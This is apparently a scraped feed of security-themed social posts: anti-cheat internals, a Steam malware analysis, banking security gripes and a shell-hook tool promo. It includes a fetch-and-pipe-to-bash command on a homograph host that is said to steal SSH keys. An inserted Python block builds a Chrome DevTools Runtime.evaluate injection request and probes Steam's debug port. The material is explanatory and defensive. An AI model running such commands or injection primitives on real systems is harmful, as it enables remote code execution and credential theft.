People complain about kernel anti-cheat until they see what EAC actually does to stay ahead.
CR3 encrypted inside EPROCESS. KdpTrap hooked to catch anything touching it during context switches. NtCreateUserProcess emulated so cheats grabbing DirectoryTableBase at process creation get a fake one.
This is what fighting kernel-level cheats actually looks like.
Full breakdown by 0xavx: https://t.co/qEFEWSKEPC
#AntiCheat #GameSecurity
I learned quite a bit from this actually.
I didn't know Steam was a Chromium app. Hence, you can kill Steam then relaunch it with the "-cef-enable-debugging" flag.
Once you've launched Steam with this, you can inject JavaScript into Steam using Chromium "webSocketDebuggingUrl" stuff.
This malware has a whole pseudo-framework of JavaScript that can do:
- Alert Bell (?)
- Block pages
- "Help page" (?)
- Inventory manipulation
- Steam library manipulation
- Profile manipulation
- Steam redirections
Basically, this malware payload switches Steam into a Chromium debug state, then sends web debug requests (kind of like Chrome DevTools?) to manipulate the Steam pages. It injects JavaScript.
The chat window that spawns is from a remote host they control. This is really cool.
Is it AI slop? Yes
Is this code EXTREMELY easy to reverse engineer? Yes
Did they unironically document their entire code base in Russian because it was (probably) written using Claude and the authors probably speak Russian? Yes
Is this extremely creative and cool? Yes
Special thanks to "pro" from 2c44. He handed me the payload and the decompiled Python. The malware .py was Base64 encoded ... so obtaining the original source was ridiculously easy.
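As an added example (not the malware's code and not from the thread author), the mechanics above can be reduced to three pieces: spotting a Steam process launched with the CEF debug flag, reading the DevTools target list that the debug listener serves, and building the `Runtime.evaluate` message an injector sends over the page's websocket. The process list and the target list below are constructed samples; the debug port, the `/json` endpoint and the `webSocketDebuggerUrl` field follow the Chromium DevTools protocol and are assumptions about how Steam's CEF build behaves, not facts stated on the page.

```python
import json
import re
import urllib.request

# Assumption (not stated in the thread): the CEF debug listener is local-only,
# serves its target list at http://localhost:<port>/json, and this is the
# default port. Treat the port as a hypothetical value for this example.
CEF_DEBUG_PORT = 8080
CEF_DEBUG_FLAG = re.compile(r"(?<!\S)-cef-enable-debugging(?!\S)")

# Constructed process command lines, as a process-list snapshot might show them.
SAMPLE_CMDLINES = [
    r'"C:\Program Files (x86)\Steam\steam.exe" -silent',
    r'"C:\Program Files (x86)\Steam\steam.exe" -cef-enable-debugging',
    r'C:\Windows\System32\svchost.exe -k netsvcs',
]

# Constructed reply in the shape a Chromium DevTools /json endpoint returns.
SAMPLE_TARGET_LIST = json.dumps([
    {"id": "A1", "type": "page", "title": "Steam",
     "url": "https://store.steampowered.com/",
     "webSocketDebuggerUrl": "ws://localhost:8080/devtools/page/A1"},
    {"id": "B2", "type": "page", "title": "Friends",
     "url": "https://steamcommunity.com/chat/",
     "webSocketDebuggerUrl": "ws://localhost:8080/devtools/page/B2"},
])


def debug_launches(cmdlines):
    """Command lines that start a Steam binary with the CEF debug flag.

    This is the defender-side check: a Steam process carrying this flag is
    exposing a DevTools listener that anything on the host can drive.
    """
    return [c for c in cmdlines
            if "steam" in c.lower() and CEF_DEBUG_FLAG.search(c)]


def devtools_targets(body):
    """Map each debuggable page's URL to its DevTools websocket endpoint.

    An injector picks the page it wants (store, community, chat) from this
    list and opens the matching websocket.
    """
    return {t["url"]: t["webSocketDebuggerUrl"]
            for t in json.loads(body) if t.get("type") == "page"}


def runtime_evaluate(msg_id, expression):
    """The CDP Runtime.evaluate request that runs `expression` in the page.

    Sent as a text frame over the page's websocket; the reply carries the
    same `id`. This is the primitive behind 'injecting JavaScript'.
    """
    return json.dumps({"id": msg_id, "method": "Runtime.evaluate",
                       "params": {"expression": expression,
                                  "returnByValue": True}})


def probe_debug_port(port=CEF_DEBUG_PORT):
    """Return the live target list if a DevTools listener answers on localhost,
    else None. Useful as a quick 'is my Steam in debug state' check."""
    try:
        with urllib.request.urlopen(f"http://127.0.0.1:{port}/json",
                                    timeout=1) as resp:
            return devtools_targets(resp.read().decode())
    except (OSError, ValueError):
        return None


def main():
    for line in debug_launches(SAMPLE_CMDLINES):
        print("Steam running with CEF debugging:", line)
    for url, ws in devtools_targets(SAMPLE_TARGET_LIST).items():
        print(f"debuggable page {url} -> {ws}")
    print(runtime_evaluate(1, "document.title"))
    print("live listener:", probe_debug_port())


if __name__ == "__main__":
    main()
```

The check that matters operationally is `debug_launches`: a legitimate Steam install has no reason to carry `-cef-enable-debugging`, so a process with that flag, or a listener answering `/json` on localhost, is the signal that the page-manipulation stage is possible.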
@SriLankaTweet@gayaradesilva Is there any verified source on this? Neither PayPal nor CBSL has had any mention of this. I feel like PayPal should announce early on for customers, which I did not receive yet.
I love this
I don't say it because I'm somehow anti-AI, I say this because it's destructive for your life.
You're going to have disrupted sleep, you're going to have disrupted relationships, your whole life will be lived between thinking of the next prompt and results of the current one.
This ain't it king
@hexmint Thanks, I'll look into these and see what sticks. I'm not a dev so I don't have much of a development workload. If there's anything that can integrate with VSCode and similar editors, that should be enough for me.
@yudhanjaya And I hate to say this but I think we need to raise the bar for IT education, or at least literacy. There are too many people attached to "AI" like it's a porn addiction and LK is not alone in this.
@SaadhJawwadh The "based in" might be what they see at sign up (they might be dynamically detecting this as well). But if you have given location access to the app, it can sense the region you are in regardless of a VPN.
@dinidu I think BOC does some funny stuff like this too (I'm primarily a NTB customer). Like BOC would email the monthly bank statement, password protected with last 4 digits of the account. But at the same time, they send the full account number in online transfer alerts 🤦♂️
@dinidu I'm all for people adopting the good standards like TOTP. But there's a good chunk of oldies in Sri Lanka who cannot be arsed to use them or to give approval to adopt the tech. With that said, it would be better to have those as an *option*.
Microsoft locked out OSR?!
Holy FUCKING shit.
I thought VeraCrypt and WireGuard were bad. Dawg, someone at Microsoft is fucking up BAD. This is ridiculous.
The initial excuse was people didn't verify their email, so it was plausible like, "oh two people probably made a small mistake, bureaucracy, dumb stuff, weird coincidence".
But then Windscribe... AND OSR?! What the fuck is going on at Microsoft? There is a galactic level of fuck up happening somewhere
@endingwithali My fav way to build new skills is to let myself be curious and intentionally play. I think when learning is framed as "catching up" instead of "letting your natural curiosity guide you", it feels like a mountain. Take things apart, look inside, play!!
https://t.co/IHTSjDcqXl
@_beyondcode I think it's based on the purpose of the chosen DNS. For example, if it's an adblocking resolver, you may wanna stick to the same "provider" for consistency.
I guess this is acceptable for end-user / domestic environments.
Be honest. When was the last time you actually read a command before pasting it into your terminal?
Because these two lines look identical:
curl -sSL https://install.example-cli | bash
curl -sSL https://іnstall.example-clі | bash
One installs your tool. The other steals your SSH keys.
That і? Cyrillic. Not Latin. Your browser would block it. Your terminal doesn't even blink.
Vibe coding made this 100x worse. Everyone's pasting commands from ChatGPT and random repos like it's nothing. We're all one bad curl | bash away from losing everything.
So I built the fix: "tirith". Invisible shell hook. Catches homograph attacks, ANSI injection, hidden commands, dotfile overwrites before they execute. 30 rules. Local only. No telemetry.
https://t.co/tIb4xThUn5
We’re deliberately not innovative. The reason this company exists is to bring back the kinds of longevity, repairability, and overall consumer ownership of technology that companies took away over the last couple of decades.